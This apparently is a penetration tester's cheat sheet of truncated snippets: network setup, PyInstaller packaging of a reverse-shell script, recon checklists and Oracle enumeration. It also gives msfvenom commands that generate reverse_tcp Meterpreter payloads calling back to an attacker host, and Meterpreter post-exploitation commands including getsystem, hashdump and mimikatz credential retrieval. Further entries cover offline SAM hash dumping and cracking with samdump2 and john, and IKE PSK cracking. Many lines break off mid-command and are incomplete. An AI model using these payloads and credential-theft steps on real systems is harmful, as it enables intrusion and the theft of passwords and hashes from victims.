[+] Reminders
LOG EVERYTHING!
Metasploit - spool /home/<username>/console.log
Linux Terminal - script /home/<username>/Engagements/TestOutput.txt #Type exit to stop
Set IP address
ifconfig eth0 192.168.50.12/24
Set default gateway
route add default gw 192.168.50.9
Set DNS servers
echo "nameserver 192.168.100.2&q...
python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py
[+] Generate the .spec file.
[+] Windows: (You want a single EXE file with your data in it, hence --onefile).
python pyinstaller.py --onefile your_main_file.py
[+] Rebuild your package.
python pyinstaller.py your_main...
The Checklist
[+] Information Gathering
Manually explore the site
Spider/crawl for missed or hidden content
Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
Check the caches of major search engines for publicly accessible sites
Check for differences in content based on User Agent (e.g., mobile sites, access as...
Tools within Kali:
oscanner
root@kali:~# oscanner -s 192.168.1.15 -P 1040
sidguess
root@kali:~# sidguess -i 192.168.1.205 -d /usr/share/wordlists/metasploit/unix_users.txt
tnscmd10g
root@kali:~# tnscmd10g version -h 192.168.1.20
Nmap
nmap -p 1521 -A 192.168.15.205
Nmap nse scripts
Metasploit auxiliaries...
[+] Setting up an Ethernet bridge in Ubuntu/Kali Linux
# Install bridge-utils
sudo apt-get install bridge-utils
# Disable network-manager + firewall
# Configuration
ifconfig
ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
ifconfig br0 up
dhclient br0
sudo tcpdump -i br0...
------------------------------------------ Mobile Application Test Notes (iPhone)
Prepping Device and Application:
[+] Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04
[+] Enable SSH on iPhone/iPad
[+] Install iFunbox to install the application (http://www.i-funbox.com)
[+] Connect device to lab wireless network
[+] Add web proxy se...
[+] Creating Metasploit Payloads
List payloads
msfvenom -l
Binaries
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f ex...
[+] Meterpreter Shell
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getsystem
meterpreter > hashdump
meterpreter > load/use mimikatz
kerberos Attempt to retrieve kerberos creds
livessp Attempt to retrieve livessp creds
mimikatz_command Run a custom command
msv Attempt...
fdisk -l
mount -t ntfs /dev/sda1 /mnt
df -k
cd /mnt
ls
cd WINDOWS/system32/config
ls
bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt
john /root/hash.txt -format=nt2 -users=Administrator
cd /root/.john
ls -l
cat john.pot...
Aggressive Mode VPN -- IKE-Scan, PSK-Crack
In IKE Aggressive mode, the authentication hash based on a preshared key (PSK) is transmitted as a response to the initial packet of a VPN client that wants to establish an IPSec tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump an...